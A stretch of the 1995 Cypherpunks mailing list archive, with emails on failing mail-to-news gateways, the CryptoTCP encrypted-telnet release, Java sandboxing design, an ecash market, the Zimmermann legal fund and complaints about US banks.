> Also, is there a method by which one can access (via netmail) a list of the
> newsgroups served by a given mail-2-news gate?

I'm not aware of any standard protocol for this. Try sending mail to system@,
root@, etc.

-Futplex <futplex@pseudonym.com>
ObFlame1: Anon, if only nsb@fv *did* write copiously here !
ObFlame2: Brad D., at least make Orlin send this crap to the list himself



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 29 Jul 95 20:44:12 PDT
To: CYPHERPUNKS@toad.com
Subject: CMOS
Message-ID: <8AE251D.000300028A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


O > stored?  How much space is in the "memory" of CMOS?

  Typically, on the order of 64 bytes.  YMMV.




 * Forrest Gump of Borg:
Assimilation is =not= like a box of chocolates....
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 29 Jul 95 19:04:12 PDT
To: cypherpunks@toad.com
Subject: Re: Financial Latency noise
Message-ID: <199507300201.WAA08367@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

There is no way for both of you to get in the last word, so allow me.
You're both right. Now please, make it stop!
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMBrnCW1lp8bpvW01AQESGgP/Vtfym5YJh7lNUd2wWRNvFnS+mmHwWE6X
DyVMPZ089YBqkxJUiXd74TyIVuoO90FiCMi6GbcRS9QziZRcVtl71hNdQb/IB62G
31kHa6n6rCzyrfdxN7NnZ/3MJh0bY+kK2hh2YK0tPjcT9o9ab/8OIp8XyukvdFbx
N4QYIxIBgXw=
=gwXi
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"This year or next, for the first time since the end of World War II,
we will spend more for interest payments on the debt than on defense.
Quite a stunning thing."  --  President  Bill Clinton
"I'm sure as hell stunned!"  --  citizen Jim Ray
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBrnySoZzwIn1bdtAQFXLAGAqpniQwKB+kSjyyzJYmppOE2nKv69k3QK
ZdENdZKGTq2wxEiqAyAMCb4qStYeXUCP
=v2Yv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sun, 30 Jul 95 00:13:50 PDT
To: Flame Remailer <remailer@flame.alias.net>
Subject: Re: Encrypted Telnet
In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9507300038.B388-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Flame Remailer wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Announcing CryptoTCP beta version 0.9
> 
> CTCP is a public domain software package to do encrypted TCP sessions on
> unix systems.  It features Diffie-Hellman key exchange with triple-DES
> encryption.  This initial release is to be considered a beta version.
> Bug reports or comments on security issues are invited.
> 
> Features:
> 
>  - May be installed by any user on the system and does not require root
>    privileges.
> 
>  - Server can protect all TCP-based services (mail, news, web, etc.)
> 
>  - Includes a secure telnet client.
> 
>  - A random key is chosen for each session, so sessions can not be
>    decrypted later or replayed.
> 
>  - Source code is available and in the public domain.

Oh, thanks a lot - tell us everything except where to get it...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sat, 29 Jul 95 22:16:49 PDT
To: cypherpunks@toad.com
Subject: Re: Mail2news Gates
In-Reply-To: <4f6_9507291907@gigo.com>
Message-ID: <m0scQWD-000v3HC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


John Erland wrote:
> I hope he does it fairly frequently, as these gates seem to have a
> half-life of about fifteen minutes.  @news.demon.co.uk was one of the
> old standbys that seemed to be stable, but it appears to have locked
> us all out now.

I usually test them about once a month or so.  Time to do an update I
guess...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 29 Jul 95 23:01:19 PDT
To: cypherpunks@toad.com
Subject: Encrypted Telnet
Message-ID: <199507300601.IAA24503@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Announcing CryptoTCP beta version 0.9

CTCP is a public domain software package to do encrypted TCP sessions on
unix systems.  It features Diffie-Hellman key exchange with triple-DES
encryption.  This initial release is to be considered a beta version.
Bug reports or comments on security issues are invited.

Features:

 - May be installed by any user on the system and does not require root
   privileges.

 - Server can protect all TCP-based services (mail, news, web, etc.)

 - Includes a secure telnet client.

 - A random key is chosen for each session, so sessions can not be
   decrypted later or replayed.

 - Source code is available and in the public domain.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.71828

mQCNAjAalD0AAAEEAMBUTOJHpIlIkK+bHYlOvt36k6szaJE9QgygMmtTlWKpDRZA
aKT4LaFKdB9trS5zUCBan55Gg+3Yj0MItwoS+8B+x9IpCizFsaymOhpt75a59kFY
935ozxxAs6GCziXb1BiCDz07OVE5X10QCa8lz9ZvDrt0X1iLk/32LDYerV6NAAUT
tCBNYXVkZSBYIDxhbHQuYW5vbnltb3VzLm1lc3NhZ2VzPg==
=WP49
- -----END PGP PUBLIC KEY BLOCK-----

Detached signature for ctcp.0.9.tar:

- -----BEGIN PGP MESSAGE-----
Version: 2.71828

iQCVAgUAMBqiPf32LDYerV6NAQHUoAP/RLU0mM3ydxC9vjzay8hR5Qmb5zupHyCO
klW8IYjxIt14jnBTqkVM7q+mnaAWK2Ishppe14H5K6MAn/VOe2o5Hf61wAzJuxzw
wywiA9ZOdb+2cxm86YMgdbrnv430BCbSjPITV5PHyorovSqhX4RLLB1R8oOX4WUB
5WwzgLyV6Kc=
=ltvK
- -----END PGP MESSAGE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.71828

iQCVAgUBMBqp7f32LDYerV6NAQHBhAP9FTq0XIlPOcd5EqtAEQISFQkZ2ISZCwQi
u4Kfpfp8xv435dBVO22Awc1R8FxgsWab7x/98CTMkKtTCtz5P30xVECfrYJP4aDF
aTEZTdBQZzx/NsozqmdhZSh7uuuS5h4IQCZWwG+dgexFZzgXYdw7+e/IIoJfo2pZ
bk5/Y1u3HGI=
=d5iJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sun, 30 Jul 95 07:59:45 PDT
To: usura@replay.com
Subject: You asked for it...4/5
In-Reply-To: <199507301435.AA26950@xs1.xs4all.nl>
Message-ID: <199507301454.AA08932@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Alex de Joode <usura@replay.com>
   Date: Sun, 30 Jul 1995 16:35:41 +0200 (MET DST)
   Organization: Replay and Company UnLimited.
   X-Reposting-Policy: ReDistribute Only with Permission
   X-Pgp-Key-Id: 0x8d56913d
   X-Mailer: ELM [version 2.4 PL21]
   Content-Type: text
   Content-Length: 122       
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   I did only receive picture number 4, the others never showed up.

   --
   Alex de Joode
   Fear Uncertainty and Doubt, Inc.				


It's probably because of the memory problems that toad's mail computer
has been having. It might get through if you ask the person to mail
it to you directly instead of to the list.

(P.S.: If toad isn't having memory problems, please, noone correct me. ;-)

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 30 Jul 95 07:14:34 PDT
To: cypherpunks@toad.com
Subject: SIN_not
Message-ID: <199507301414.KAA07174@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-30-95. NYPaper:


   "His Terrible Swift Sword: Thomas Sowell takes the shortest
   way with left-liberal elites." [Book Review]

      His stated mission is to attack and destroy the dominant
      intellectual elites of modern America: those liberal and
      left-wing intellectuals whose disproportionate control
      over the American psyche he believes responsible for the
      drift, stagnation and disquiet of our times. The
      anointed, as he dubs them with ill-concealed derision,
      have the right degrees and clubby credentials, but tbeir
      false sense of noblesse oblige and their inordinate
      faith in their own intelligence and probity blind them
      to the cautious, decentralized and incremental logic of
      markets. In consequence, they unwisely embrace huge
      government interventions to end a set of social "crises"
      that never existed. They have expanded civil liability
      beyond recognition. They have led the civil rights
      movement away from equal opportunity and individual
      merit into the bottomless pit of affirmative action and
      minority set-asides. They have wrecked the criminal
      justice system and have licensed judges to stray from
      judicial restraint into the lawless world of judicial
      activism.                                      NIF_pig


   "N.R.A. Criticized for Aggressive Tactics: Against the
   A.T.F."

      The National Rifle Association has entered an aggressive
      new phase in its long and contentious relationship with
      the Bureau of Alcohol, Tobacco and Firearms. Opponents
      of the N.R.A., as well as some of its longtime
      supporters, say some of the organization's tactics have
      crossed ethical boundaries and may well have backfired,
      reinforcing an image of the group as dominated by
      right-wing zealots.                            NAW_leg


   Duet:  SIN_not






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sun, 30 Jul 95 09:11:27 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted Telnet
In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl>
Message-ID: <950730.110035.8D0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, remailer@flame.alias.net writes:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Announcing CryptoTCP beta version 0.9

Looks fun.  Any chance of a pointer to where to find it?
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMBus0Bvikii9febJAQHVHQQAkvFmTeUttqQTQHmlS+/7G8Kb6jigfLFT
8pcT0rnkDDuRPD902F7xRLO+5OPQaM19w1Z7rY8jcaKW/01pTkqISfpCTyWsF6F5
MRO3CKMDMuy9Y7QTYh4E7115tf7rkkfm40anM34RJ2ZXrEsEUL9erJaV4aA5DigT
ldA4MQQI3PY=
=kjrb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Sun, 30 Jul 95 11:25:36 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <9507301823.AB20787@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


>Nathaniel Borenstein <nsb@nsb.fv.com> writes on cpunks:
>The URL being used is http://www.netresponse.com/zldf, and nowhere
>does it mention using PGP and CC #'s.  Most people who can't use PGP
>aren't going to be interested I would have thought.  

Actually, I think you're wrong on that score.  I've met quite a few people
who understand the importance of the principles involved, and who support
Phil's caue wholeheartedly, but who have never even tried to learn PGP
(never felt the need, I guess).

However, I agree that the pages should at least contain a link to the other
ZLDF site, which mentions how to use PGP and credit card numbers.

>Okay, now separate issue, really talking about FV now.  For me, the
>main thing holding me back from using it is that I'm not in the US,
>and don't have a US bank account to open a FV seller acct.  (I would
>have liked to use it as one of the few net payment systems actually up
>and running, as a payment method for the RSA T-shirts, it would have
>been a nice system, allowing me to effectively accept VISA payments
>which I have otherwise been unable to do.)
>
>Any news on this front?  Last I looked on your WWW page, you were
>investigating this and payments in other currencies.  US$ would be
>fine though, as long as it was possible for the seller to create a US
>account, or have it paid to a non-US account (would it not be possible
>to pay to non-US account?).

Of course it's possible, and it's definitely something we intend to do
*eventually*.  The real question is how hard it is, and how high-priority
it is.  We're trying to do a zillion things at once, as you can imagine. 
To pay into non-US accounts, we need to establish banking relationships in
other venues.  For the most part, we need to do it one country at a time,
which is awesomely time-consuming (although there may be some shortcuts,
e.g. to do all of Europe at once).

However, it is worth noting that we DO have non-US sellers already. 
Remember, the requirement is not that you be in the US, but rather than you
have an account in a US bank.  This is not all that hard for a non-US
citizen to do **IF** you can show up physically at a US bank.  Thus, if
there's a US bank that has an office near you, you can walk in and open an
account to which deposits can be made through the US direct-deposit system,
and  you're in business with FV.

What we'd really hoped to have up and running by now, as a short-term
expedient, was an expedited mechanism whereby non-US people could open
accounts at a US bank by mail, without the physical presence.  This turns
out to be contrary to a lot of established procedures in the US banking
world, so we're still looking for a bank that's willing to set up this kind
of expedited procedure for account setup.  If and when we get that working,
we will certainly be announcing the availability of that service on
fv-users and similar venues.  (I probably won't announce it on cypherpunks,
since I think many people already think FV is too-much-discussed here.  My
intent with FV on cypherpunks is to only talk about FV in contexts where it
is directly relevant, in particular when other people bring it up.)  --
Nathaniel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 30 Jul 95 15:24:37 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <199507302224.PAA10093@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 PM 7/30/95 EDT, nsb@nsb.fv.com wrote:
> However, it is worth noting that we DO have non-US sellers already. 
> Remember, the requirement is not that you be in the US, but rather than you
> have an account in a US bank.  This is not all that hard for a non-US
> citizen to do **IF** you can show up physically at a US bank.

Many years ago I obtained a US account by mail
from overseas, using cheques made out to me from 
US sources.

I did this with the bank of America.  No big problem.  But as
time went by, their ability to handle financial events that were
out of the ordinary deteriorated spectacularly.

Perhaps this is partly because things tightened up, but
it is also that most US banks have developed a monolithic 
and obstructionist bureaucracy that is incapable of handling 
any event that is out of the ordinary.

> What we'd really hoped to have up and running by now, as a short-term
> expedient, was an expedited mechanism whereby non-US people could open
> accounts at a US bank by mail, without the physical presence.  This turns
> out to be contrary to a lot of established procedures in the US banking
> world,

By and large, over the past twenty years, there has been a 
decisive move towards financial management by guys who could 
not find their ass with both hands.


US banks simply do not work well for international transactions.

The problem is not so much money laundering laws as intolerable
ignorance, provincialism, and incompetence.

If you insist that international transactions be mediated through 
US banks, you are cutting your throat.

Go look for banks that are truly international.  You will not
find them in America.





 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 30 Jul 95 08:24:50 PDT
To: cypherpunks@toad.com
Subject: Experimental Ecash Market
Message-ID: <Pine.3.89.9507301603.A1445-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



For those who want to buy and sell ecash for real cash, there's now an
experimental Ecash Market WWW page at :

http://www.c2.org/~mark/ecash/ecash.html

You can submit an offer to add to the lists of buyers and sellers for free
(though if people start submitting fake offers I may charge for it in
future), or buy the email address of a buyer or seller for c$ 0.50.  Since
I'm still in the process of finishing off the software, the site may go up
and down, or simply get dodgy, over the next few weeks. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 30 Jul 95 07:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: You asked for it...4/5
Message-ID: <199507301435.AA26950@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text



I did only receive picture number 4, the others never showed up.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sun, 30 Jul 95 07:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted Telnet
Message-ID: <199507301453.QAA00526@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp sez:

: On Sun, 30 Jul 1995, Flame Remailer wrote:
:
: > Announcing CryptoTCP beta version 0.9

[..]

: Oh, thanks a lot - tell us everything except where to get it...


ftp://utopia.hacktic.nl/pub/crypto/

--
Alex de Joode
Fear, Uncertainty and Doubt, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dani.goldenholz@vircomm.com (Dani Goldenholz)
Date: Sun, 30 Jul 95 09:33:24 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
Message-ID: <1775103966.462267@vircomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks man!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sun, 30 Jul 95 17:34:07 PDT
To: cypherpunks@toad.com
Subject: Another Newsgate Dies
Message-ID: <726_9507301723@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



Looks like mail2news@bham.ac.uk is also dead now (wait, isn't the utexas
gate _also_ dead, or was it so problematic that it was not advised?):

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

* Originally from news2mail@sun4.bham.ac.uk (1:203/2) to John Erland.
* Original dated: Jul 30 '95, 04:05

This reply has been automatically generated by the mail-to-news system.
Your message was not posted to Usenet because this facility has been
withdrawn.

Use a different mail-to-news gateway, such as the one at cs.utexas.edu
(mail news-group-name@cs.utexas.edu).

The text of your rejected message is below...

----
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Defender <crypto@shaq.midex.com>
Date: Sun, 30 Jul 95 09:36:24 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Experimental Ecash Market
In-Reply-To: <Pine.3.89.9507301603.A1445-0100000@unicorn.com>
Message-ID: <Pine.3.89.9507301737.A10422-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark,

Let me know if you need any help with the page.  I am willing and able to 
set up a similar server at my site here at Midex.  I need to get up and 
going with the various ecash software.  Is there a comprehensive list or 
pointers out there to be had?

Matt

On Sun, 30 Jul 1995, Rev. Mark Grant wrote:

> 
> For those who want to buy and sell ecash for real cash, there's now an
> experimental Ecash Market WWW page at :
> 
> http://www.c2.org/~mark/ecash/ecash.html
> 
> You can submit an offer to add to the lists of buyers and sellers for free
> (though if people start submitting fake offers I may charge for it in
> future), or buy the email address of a buyer or seller for c$ 0.50.  Since
> I'm still in the process of finishing off the software, the site may go up
> and down, or simply get dodgy, over the next few weeks. 
> 
> 	Mark
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sun, 30 Jul 95 17:16:24 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507302305.TAA16631@bb.hks.net>
Message-ID: <Pine.3.89.9507301717.E26667-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Lucky Green wrote:

> Six years ago, you could walk into a Bank, show them your driver license,
> and open an  account.
> Today, you need several pieces of ID.
> Three years ago, you could withdraw money from your own account without
> having  your checkbook on you.
> Today, they make you pay for a "counter check".
> One year ago, you could walk into a bank an cash a check drawn onto an
> account at the very same bank.
> Today (Coast Federal), they make you pay a $10 check cashing fee.

When I lived in California, I banked at Security Pacific, then changed
over my account to BofA.  When I left the bay area, I closed my account,
not knowing that someone had sat on a check for $120 - I thought it was me
just entering an ATM receipt twice (as I do from time to time).  So,
someone from a place called ChexSystems sends me a letter, saying "well,
you had a check go through and the bank paid it, please pay us."  So, I
send them the $120 or whatever it was. 

When I tried to open a checking acount in Utah, I find that I can't, for
the sole reason that I had been "reported to ChexSystems".  I explained
the situation to no avail.  BofA refuses to remove the charge, saying that
it's "against their policy".  ChexSystems refuses to do anything about it,
saying that "it was a valid debt", one which I neither knew about nor
agreed to.  If the bank would've mailed me a letter, saying that they
bounced the check, or paid it and please remit, I would've been happy to. 
Instead, they chose to try and screw me over by reporting the so-called
"debt" to some sort of check reporting system.  From my point of view, the
action by the bank was malicious and done with the intent of causing me
harm.  I don't recommend anyone doing business with BofA for this reason,
and I strongly urge that people immediately close their accounts with BofA,
refuse to do business with them, and switch to another bank which refuses
to participate in such malicious practices. 

I'm *not* impressed.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 30 Jul 95 15:09:33 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Military Prisons for Citizen-Units
In-Reply-To: <ac3f32b004021004c868@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950730180306.12610A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, Timothy C. May wrote:

> At 5:42 PM 7/28/95, Brian Davis wrote:
> >The military is not authorized to listen in to any phone calls they want
> >to hear.  Otherwise, everyone on the list, including me, would probably
> >be in some hidden military prison.
> >
> >:-)  for the humor-impaired.
> 
> This is not so.
> 
> The military _did_ put me in one of their hidden military prisons, but
> decided I would be more useful on the Cypherpunks list. I recognize several
> other names here from my work brigade.
> 
> --Citizen-Unit Tim "The Zek" May
> 

I said nothing about co-opting formerly free spirits for undercover 
duty.  Having outed yourself, you have subjected yourself to termination.
After all the government has done for you  ...  a pity.  But a good 
example to the "others."

Darth Vader




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sun, 30 Jul 95 15:05:37 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507282003.AA24860@tyrell.net>
Message-ID: <199507302205.SAA20751@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Fraering writes:
> How would you make Java secure or create a secure Javalike language?
> (Secure to your satisfaction, of course).

Well, you can't make anything secure, but you can make things more
secure.

My fundamentnal design principles are:

1) You can't abuse features you don't have.
2) You can't abuse privs you don't have.
3) You can't catastrophically fail to do something you don't do.

I would eliminate the notion of having the Java interpreter make the
system "safe" with language features that cripple certain threads of
execution. Instead, I'd emasculate the whole system. Remove any i/o
features right out of the interpreter -- ditto execution features or
other features. I'd run the interpreter in a separate unix process
communicating only through two pipes, one down which you feed code and
mouse events and one up which you get bitmaps and URLs to fetch. The
interpreter runs in a padded cell and can't alter the world except by
passing up bitmaps and URLs. It doesn't talk to anything other than
the browser.

Even then, I'm not entirely comfortable, but I'm more comfortable.

> What sort of interface does it have to the filesystem? I would guess that
> a secure language would have its own filesystem mapped to a file of fixed
> size in the normal filesystem, so that it couldn't cause disaster by
> filling your hard disk.

Thats not a secure system, because you depend on the interpreter
properly doing the mapping. If there are no system calls to open(2) in
the whole program it can't misuse any of those calls. If there are no
calls to exec, it can't mis-execute things. Security through emasculation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 30 Jul 95 16:08:35 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507302305.TAA16631@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507302224.PAA10093@blob.best.net>, jamesd@echeque.com
("James A. Donald") wrote:

>Many years ago I obtained a US account by mail
>from overseas, using cheques made out to me from 
>US sources.
>
>I did this with the bank of America.  No big problem.  But as
>time went by, their ability to handle financial events that were
>out of the ordinary deteriorated spectacularly.
>
>Perhaps this is partly because things tightened up, but
>it is also that most US banks have developed a monolithic 
>and obstructionist bureaucracy that is incapable of handling 
>any event that is out of the ordinary.

Six years ago, you could walk into a Bank, show them your driver license,
and open an  account.
Today, you need several pieces of ID.
Three years ago, you could withdraw money from your own account without
having  your checkbook on you.
Today, they make you pay for a "counter check".
One year ago, you could walk into a bank an cash a check drawn onto an
account at the very same bank.
Today (Coast Federal), they make you pay a $10 check cashing fee.

The US banking industry has gone to the dogs. The day a non-US bank offers
an account that can be accessed over the net will be the day I close my US
accounts.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBwQDCoZzwIn1bdtAQGqHQF8C1QShMuN0Eq74mMI5rculIym8xjzYV8C
mErjtB8tJ7UseKD9bmNY6dpWqBviplMp
=aBGi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Sun, 30 Jul 95 17:05:16 PDT
To: cypherpunks@toad.com
Subject: C'punks at DefCon
Message-ID: <013.09272796.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> Are any of us cpunks having a gathering at Defcon?  (besides the 
> one

Well, a couple other c'punks have mailed me to determine a time and a 

place.  It looks like everyone wants to meet in the lobby of the 
Tropicana sometime Friday before Hacker Jeopardy.  Nobody has stated 

a concrete time yet so I guess we'll all just wander through the 
lobby every now and then.  Any suggestions on a time?

Eldon Jenkins





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Sun, 30 Jul 95 17:58:02 PDT
To: dccp@eff.org
Subject: PRZ Interview in Infobahn Magazine
Message-ID: <Pine.ULT.3.91.950730205110.15049H-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I generally try to avoid buying anything with the word "Infobahn" on it,
but in the premiere issue of this new magazine there's a 5-page article
about Phil Zimmerman written by Jeff Elliot (of the National Review...but
it's a good article anyway ;).  It's pretty good--if anyone is new to the
ongoing Zimmerman drama it's a good sum-up. 

-=Kathleen M. Ellis=-

(This message also serves as a test for the new DC-Cypherpunks list server.)

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 30 Jul 95 20:57:03 PDT
To: cypherpunks@toad.com
Subject: U.S. Banks are not all that bad
Message-ID: <ac419fc0000210046951@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Hate to disagree with Lucky, but....

At 11:05 PM 7/30/95, Lucky Green wrote:
>Six years ago, you could walk into a Bank, show them your driver license,
>and open an  account.
>Today, you need several pieces of ID.

I've cashed checks at Bank of America, Wells Fargo, Comerica (whatever
_that_ is), etc., without having an account at these banks, and without
having to pay any fee, and without any more ID than a driver's license. (I
have no accounts at California banks, so all checks sent to me are,
perforce, not checks drawn at "my" bank...and yet I've never had to pay a
dime to cash a check. The times I've gotten out of state checks, I've of
course not expected third parties to cash them for free for me...usually I
just deposit them by mail.)

>Three years ago, you could withdraw money from your own account without
>having  your checkbook on you.
>Today, they make you pay for a "counter check".

Hasn't happened to me.

>One year ago, you could walk into a bank an cash a check drawn onto an
>account at the very same bank.
>Today (Coast Federal), they make you pay a $10 check cashing fee.

Hasn't happened to me. I walk into banks, present the checks drawn on their
own bank, ask to have it cashed, and all they want is to make sure I'm the
person to whom the check is drawn. No fees, no refusals to cash.

>The US banking industry has gone to the dogs. The day a non-US bank offers
>an account that can be accessed over the net will be the day I close my US
>accounts.

Maybe I have the magic touch.

I find U.S. banks to be marvels of efficiency. (But then I can remember
running out of cash on a Saturday and having no way to get any more cash
except by borrowing from friends...the ATM revolutionized things around
1980.)

I'm not speaking of "interesting" banking applications, which, I fear, are
not permitted by current U.S. banking laws.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
